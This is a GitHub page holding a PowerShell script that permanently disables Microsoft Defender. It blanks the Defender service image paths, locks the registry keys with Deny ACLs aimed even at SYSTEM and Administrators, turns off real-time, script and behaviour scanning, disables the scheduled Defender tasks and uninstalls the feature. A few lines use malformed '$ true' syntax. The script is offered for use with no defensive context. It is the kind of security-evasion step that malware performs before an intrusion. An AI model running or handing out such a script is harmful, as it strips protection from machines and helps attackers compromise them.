-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdisable windows defender.ps1
101 lines (80 loc) · 5.13 KB
/
disable windows defender.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
$registryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
$key = Get-Item -Path $registryPath
$users = @("TrustedInstaller", "ALL APPLICATION PACKAGES", "CREATOR OWNER", "SYSTEM", "Administrators", "Users")
foreach ($user in $users) {
$acl = Get-Acl -Path $registryPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule($user, "FullControl", "Deny")
$acl.AddAccessRule($rule)
Set-Acl -Path $registryPath -AclObject $acl
}
$registryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
$key = Get-Item -Path $registryPath
$users = @("TrustedInstaller", "ALL APPLICATION PACKAGES", "CREATOR OWNER", "SYSTEM", "Administrators", "Users")
foreach ($user in $users) {
$acl = Get-Acl -Path $registryPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule($user, "FullControl", "Deny")
$acl.AddAccessRule($rule)
Set-Acl -Path $registryPath -AclObject $acl
}
$registryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\WdFilter"
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
$key = Get-Item -Path $registryPath
$users = @("TrustedInstaller", "ALL APPLICATION PACKAGES", "CREATOR OWNER", "SYSTEM", "Administrators", "Users")
foreach ($user in $users) {
$acl = Get-Acl -Path $registryPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule($user, "FullControl", "Deny")
$acl.AddAccessRule($rule)
Set-Acl -Path $registryPath -AclObject $acl
}
$registryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisDrv"
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
$key = Get-Item -Path $registryPath
$users = @("TrustedInstaller", "ALL APPLICATION PACKAGES", "CREATOR OWNER", "SYSTEM", "Administrators", "Users")
foreach ($user in $users) {
$acl = Get-Acl -Path $registryPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule($user, "FullControl", "Deny")
$acl.AddAccessRule($rule)
Set-Acl -Path $registryPath -AclObject $acl
}
$registryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
$key = Get-Item -Path $registryPath
$users = @("TrustedInstaller", "ALL APPLICATION PACKAGES", "CREATOR OWNER", "SYSTEM", "Administrators", "Users")
foreach ($user in $users) {
$acl = Get-Acl -Path $registryPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule($user, "FullControl", "Deny")
$acl.AddAccessRule($rule)
Set-Acl -Path $registryPath -AclObject $acl
}
$registryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\WdBoot"
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
$key = Get-Item -Path $registryPath
$users = @("TrustedInstaller", "ALL APPLICATION PACKAGES", "CREATOR OWNER", "SYSTEM", "Administrators", "Users")
foreach ($user in $users) {
$acl = Get-Acl -Path $registryPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule($user, "FullControl", "Deny")
$acl.AddAccessRule($rule)
Set-Acl -Path $registryPath -AclObject $acl
}
Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue
Set-MpPreference -DisableRealtimeMonitoring $true
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
Get-ScheduledTask "Windows Defender Cache Maintenance" | Disable-ScheduledTask
Get-ScheduledTask "Windows Defender Cleanup" | Disable-ScheduledTask
Get-ScheduledTask "Windows Defender Scheduled Scan" | Disable-ScheduledTask
Get-ScheduledTask "Windows Defender Verification" | Disable-ScheduledTask
Set-MpPreference -DisableRealtimeMonitoring $ true -DisableAutoExclusions $ true -DisablePrivacyMode $ true -DisableBehaviorMonitoring $ true -DisableIntrusionPreventionSystem $ true -DisableIOAVProtection $ true -DisableScriptScanning $ true -DisableArchiveScanning $ true -DisableCatchupFullScan $ true -DisableCatchupQuickScan $ true -DisableEmailScanning $ true -DisableRemovableDriveScanning $ true -DisableRestorePoint $ true -DisableScannedMappedNetworkDrivesForFullScan $ true -DisableScanningNetworkFiles $ true -DisableBlockAtFirstSeen $ true
Set-MpPreference -MAPSReporting 0
Uninstall-WindowsFeature -Name Windows-Defender
Set-MpPreference -DisableRealtimeMonitoring $true